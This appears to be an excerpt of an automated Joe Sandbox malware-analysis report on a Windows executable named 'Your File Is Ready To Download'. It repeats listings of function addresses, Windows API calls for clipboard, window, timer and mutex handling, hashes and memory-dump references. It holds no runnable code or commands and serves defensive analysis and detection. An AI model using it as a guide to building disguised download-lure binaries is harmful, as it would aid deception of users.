Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: ec465ce985f3590984f313cf95e74e87ee920b2bac1517a900fecdb38bbdb863
Instruction ID: ee5d634fcf41254915d86c373dc42fdfc7f6f8b5312075923867e9f6d9002814
Opcode Fuzzy Hash: ec465ce985f3590984f313cf95e74e87ee920b2bac1517a900fecdb38bbdb863
Instruction Fuzzy Hash: 46813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038072, Relevance: 9.2, APIs: 6, Instructions: 165windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 6af4cafa7645ca0d19bb70a240b80c8d55da3761b7af51c436b3005c26da332b
Instruction ID: 1b30798b1377f75516e605ea33ce9a3950fddf6f16ae8d23b6453b877e43e083
Opcode Fuzzy Hash: 6af4cafa7645ca0d19bb70a240b80c8d55da3761b7af51c436b3005c26da332b
Instruction Fuzzy Hash: 1D814B31604B408AFB6B8B27A8443EA77A2F78DBD4F544216EB5947AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400380AD, Relevance: 9.2, APIs: 6, Instructions: 165windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 27719b4e66d859d05af943290ad14b01a9348f50b4a9763f99d21d76d44fa491
Instruction ID: 0eede45efb6dbe6180b3eadb5b0033695b89b2d8e980fa6613eb0566b9fccf6b
Opcode Fuzzy Hash: 27719b4e66d859d05af943290ad14b01a9348f50b4a9763f99d21d76d44fa491
Instruction Fuzzy Hash: A2814A31604B4086FB6B8B27A8443EA77A2F78DBE4F544216EB5947AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400249D0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 204timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32 ref: 0000000140024B0A
KillTimer.USER32 ref: 0000000140024B55
_wcstoi64.LIBCMT ref: 0000000140024BEB
GetTickCount.KERNEL32 ref: 0000000140024C95

Strings

Out of memory., xrefs: 0000000140024A7C

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Timer$CountKillTick_wcstoi64
String ID: Out of memory.
API String ID: 806017027-4087320997
Opcode ID: a6d08107c02996d88001bab1e8ae93ceb78ac514442e0b0d63dd071fc72e90f8
Instruction ID: 1a71694c741cd85951e4a18acfd2b76b889b676dd512602cade19e755bea1baf
Opcode Fuzzy Hash: a6d08107c02996d88001bab1e8ae93ceb78ac514442e0b0d63dd071fc72e90f8
Instruction Fuzzy Hash: B991AF3250938485FBAB9B27A4103EA76E0E75CBD8F58801AEB46072F5DB78CC85C751

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140080940, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32 ref: 000000014008094B
GetFullPathNameW.KERNEL32 ref: 0000000140080980
GetFileAttributesW.KERNEL32 ref: 00000001400809B0
SHFileOperationW.SHELL32 ref: 0000000140080A0E

Strings

\, xrefs: 000000014008099E

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: File$AttributesDirectoryFullNameOperationPathRemove
String ID: \
API String ID: 934956312-2967466578
Opcode ID: abfacf19e0e2b0d56d8626a23501b17902ef0406dac0c3c1b513688cb21f9f0a
Instruction ID: 69f54ea565988d367714232a65d9e8a6bbefc7d64edb126474b39be0452a495a
Opcode Fuzzy Hash: abfacf19e0e2b0d56d8626a23501b17902ef0406dac0c3c1b513688cb21f9f0a
Instruction Fuzzy Hash: 0C21303651878482EBA18F25B4843DEB3A4FB89760F541315F7E953AE8DB3CC55ACB10

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000B960, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00000000,0000000140014CC3), ref: 000000014000B976
CreateMutexW.KERNEL32(?,?,00000000,0000000140014CC3), ref: 000000014000B987
GetLastError.KERNEL32(?,?,00000000,0000000140014CC3), ref: 000000014000B990
CloseHandle.KERNEL32(?,?,00000000,0000000140014CC3), ref: 000000014000B9B3

Strings

AHK Mouse, xrefs: 000000014000B97C

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: AHK Mouse
API String ID: 2372642624-1022267635
Opcode ID: 41e1bf0884d4d22b0c023acbabe27d07048347046e36961ea91cca6188895307
Instruction ID: 616d2b88fc25e42bf00dc7f758e0de2bc3c1f4f88e400240b1a6d1af86e87663
Opcode Fuzzy Hash: 41e1bf0884d4d22b0c023acbabe27d07048347046e36961ea91cca6188895307
Instruction Fuzzy Hash: 27F01771620B8181FB1AEB63B9447E923A1AB8CBC4F584424EB464B2B4EF3CC4868350

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B12D0, Relevance: 7.6, APIs: 5, Instructions: 130windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,000000014000C660), ref: 00000001400B1324
IsWindowVisible.USER32 ref: 00000001400B133E

Part of subcall function 00000001400B2BC0: _wcstoui64.LIBCMT ref: 00000001400B2D13
Part of subcall function 00000001400B2BC0: IsWindow.USER32 ref: 00000001400B2D2E

IsWindow.USER32 ref: 00000001400B144B

Part of subcall function 00000001400B2A30: IsWindowVisible.USER32 ref: 00000001400B2A45

GetWindowLongW.USER32 ref: 00000001400B1472
EnumWindows.USER32 ref: 00000001400B14C0

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$Visible$EnumForegroundLongWindows_wcstoui64
String ID:
API String ID: 4171984316-0
Opcode ID: 335439f4e68c99857adbed605d794ed07292af58113ad0c3d889f7cb00e45202
Instruction ID: 50957558d2bac65d5a0f0301039e8070d74cf8cf8d59faecbdf0c4474ac59b39
Opcode Fuzzy Hash: 335439f4e68c99857adbed605d794ed07292af58113ad0c3d889f7cb00e45202
Instruction Fuzzy Hash: B8514D72609BC089EB769FA694403E933F0F798BC4F844125EB4D47AA8EF38C695C350

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C9A94, Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB,?,?,?,?,?,?,?), ref: 00000001400C9ABD
DecodePointer.KERNEL32(?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB,?,?,?,?,?,?,?), ref: 00000001400C9ACD

Part of subcall function 00000001400CC12C: _errno.LIBCMT ref: 00000001400CC135
Part of subcall function 00000001400CC12C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CC140

EncodePointer.KERNEL32(?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB,?,?,?,?,?,?,?), ref: 00000001400C9B4B

Part of subcall function 00000001400CF338: Sleep.KERNEL32(?,?,00000000,00000001400C9B3B,?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB), ref: 00000001400CF37F

EncodePointer.KERNEL32(?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB,?,?,?,?,?,?,?), ref: 00000001400C9B5B
EncodePointer.KERNEL32(?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB,?,?,?,?,?,?,?), ref: 00000001400C9B68

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinfo
String ID:
API String ID: 3588582179-0
Opcode ID: b795dc57f4cb8a3d5a22db6d4e355363c93c1ec374df195943046e22bbb00258
Instruction ID: 3f557c3126f830030184acf8fbfecfe3d8ac381e203001ca69663bd1b9d35383
Opcode Fuzzy Hash: b795dc57f4cb8a3d5a22db6d4e355363c93c1ec374df195943046e22bbb00258
Instruction Fuzzy Hash: 8D214F31316B84A1EA4A9F63FA483D9A361B74DBD0F444425EB4E477B5DB3CD4868310

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140056270, Relevance: 7.5, APIs: 5, Instructions: 44timeclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140056289
CloseClipboard.USER32 ref: 0000000140056296
GetCurrentProcessId.KERNEL32 ref: 00000001400562AA
EnumWindows.USER32 ref: 00000001400562C5
SetTimer.USER32 ref: 000000014005630B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ClipboardCloseCurrentEnumGlobalProcessTimerUnlockWindows
String ID:
API String ID: 555064778-0
Opcode ID: 512200af9b421bcc91f46b38394b70415b835aed18dba499327a4d27b5a3b211
Instruction ID: 0cdf5ddba3f1d893595b21aa374ca929dea06b1aa34aba6674c1527ddf9d8a6f
Opcode Fuzzy Hash: 512200af9b421bcc91f46b38394b70415b835aed18dba499327a4d27b5a3b211
Instruction Fuzzy Hash: 22212335215A8685EA56DF23E8003D973A5FB8CBD1F088522EF4957334DFB9C486CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140088C90, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 307COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000000140088D7E

Strings

Out of memory., xrefs: 0000000140088D9C
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140088D04

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: malloc
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 2803490479-457448710
Opcode ID: 962475862ce58a501ca017868885b293181f08d73a3d73935b49d3331adabad2
Instruction ID: c16a91a66321830c91e641045377a95d697e7605c098d77f630e48ad81b416ae
Opcode Fuzzy Hash: 962475862ce58a501ca017868885b293181f08d73a3d73935b49d3331adabad2
Instruction Fuzzy Hash: 4DD19F73205B8085EB629B22E8007DA77A5F34CBD8F444126EF9947BB9DB39C656C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001E810, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 192COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00000001,00000000,00000000,00000000,000000014000599A), ref: 000000014001E84D
GetModuleFileNameW.KERNEL32(?,00000001,00000000,00000000,00000000,000000014000599A), ref: 000000014001EA8E

Strings

Out of memory., xrefs: 000000014001E8B6, 000000014001E960, 000000014001EA30
%s\%s, xrefs: 000000014001E9DD

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: FileModuleName
String ID: %s\%s$Out of memory.
API String ID: 514040917-1641153398
Opcode ID: 7bb5f6392c13de32ed954d73445a8d930afbff67819e6940ae5ed36bc8276266
Instruction ID: 36179cfa48576f1010de6119c94513e0e14121ed8a6e5d825468c209052811d2
Opcode Fuzzy Hash: 7bb5f6392c13de32ed954d73445a8d930afbff67819e6940ae5ed36bc8276266
Instruction Fuzzy Hash: E481A132225B8191EA66DB22E4007DE7360FB48BF4F541316BB6E5BAE9EF39C505C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140004160, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 167timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004DB0: GetTickCount.KERNEL32 ref: 0000000140004DE8

GetTickCount.KERNEL32 ref: 000000014000420C
wcsncpy.LIBCMT ref: 0000000140004248
KillTimer.USER32 ref: 0000000140004360

Strings

call, xrefs: 00000001400042B0

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$KillTimerwcsncpy
String ID: call
API String ID: 2737708082-3431870270
Opcode ID: 37d7ff779abc14d6e1ecb63fb7378b9a311257a463db1f0f604546463304d27f
Instruction ID: 852a91b1c94f6d021760ec1a1785789ef70f95e0ea24978204527d4336cfa0cd
Opcode Fuzzy Hash: 37d7ff779abc14d6e1ecb63fb7378b9a311257a463db1f0f604546463304d27f
Instruction Fuzzy Hash: CE8149F220878086FB6ADF62B5503E977A4E79CFD4F585015EB490B6BACB38C950C744

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140018F80, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140018FC6
GetForegroundWindow.USER32 ref: 000000014001900C
GetWindowTextW.USER32 ref: 0000000140019046

Strings

N/A, xrefs: 0000000140019082

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$CountForegroundTextTick
String ID: N/A
API String ID: 3416458291-2525114547
Opcode ID: df7a5117c564b3d00e730dad4c93e652198f1c0a0ad2c18a70f066b6c9ef4452
Instruction ID: 0f917789c4035ce941d36a2c65b6ceb932b185ad6201de78cb80a006d4cb495e
Opcode Fuzzy Hash: df7a5117c564b3d00e730dad4c93e652198f1c0a0ad2c18a70f066b6c9ef4452
Instruction Fuzzy Hash: A7316A76225B4086EB2ACB57E440BE8B7B1FB8CF80F44911AAF4A1B374DB38C451D710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B10D0, Relevance: 6.1, APIs: 4, Instructions: 124windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,000000014000C62A), ref: 00000001400B1131
IsWindowVisible.USER32 ref: 00000001400B114B
GetForegroundWindow.USER32(?,?,?,000000014000C62A), ref: 00000001400B1189
IsWindowVisible.USER32 ref: 00000001400B11DE

Part of subcall function 00000001400B29A0: LoadLibraryW.KERNEL32 ref: 00000001400B29C3
Part of subcall function 00000001400B29A0: GetProcAddress.KERNEL32 ref: 00000001400B29D3

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ForegroundVisible$AddressLibraryLoadProc
String ID:
API String ID: 559202094-0
Opcode ID: 6248c192427a1d3dd99ebe04f6433db0eebba08908ab2fe341e3bec2794d360d
Instruction ID: 1a6984598fb14b8e63d9e91294adc971c0daecd6412528570a7c21e0056d2ccb
Opcode Fuzzy Hash: 6248c192427a1d3dd99ebe04f6433db0eebba08908ab2fe341e3bec2794d360d
Instruction Fuzzy Hash: A3513032A14B8495EB769F97A4443EA63F4FB8D7C0F888425AB89437A9DF78C495C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CB6DC, Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001400CB62D
_invalid_parameter_noinfo.LIBCMT ref: 00000001400CB638
_errno.LIBCMT ref: 00000001400CB671
_errno.LIBCMT ref: 00000001400CB684

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: e44d9751ab83f9eac3822172d4e37df1e53dc9dee7fe53149ab32d126ed00420
Instruction ID: 9189f30b2e790fbefeec2a5cd05824a462f3852bbb78a9110cc9fbecedb52df9
Opcode Fuzzy Hash: e44d9751ab83f9eac3822172d4e37df1e53dc9dee7fe53149ab32d126ed00420
Instruction Fuzzy Hash: B3216D7520974192FA5BAB53E8013EEA6A5BB4CBD8F044021BF89477B5EF3CC891DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B30E0, Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

GetWindowTextW.USER32 ref: 00000001400B312C
GetWindowThreadProcessId.USER32 ref: 00000001400B3150
GetWindowThreadProcessId.USER32 ref: 00000001400B3167
GetClassNameW.USER32 ref: 00000001400B31B7

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ProcessThread$ClassNameText
String ID:
API String ID: 3420357866-0
Opcode ID: 8b5372ecae805b86ce8566f726c3a3ba7e0e2a4a0a5f6b5cfe6ab6aa161a5fdb
Instruction ID: 0e1ef68aac705a4c90e161c2664fe846c7d83e4fee0df37d1276a1d9e67e7a16
Opcode Fuzzy Hash: 8b5372ecae805b86ce8566f726c3a3ba7e0e2a4a0a5f6b5cfe6ab6aa161a5fdb
Instruction Fuzzy Hash: 1F216D32220AC581EB529F66D8403F967A4EB49FC8F189425EF494B6A8DF38C546C720

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001E060, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113comCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014009FF40: malloc.LIBCMT ref: 000000014009FF8C

OleInitializeWOW.OLE32 ref: 000000014001E2F0

Strings

No tray mem, xrefs: 000000014001E2CB
Tray, xrefs: 000000014001E2AD

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
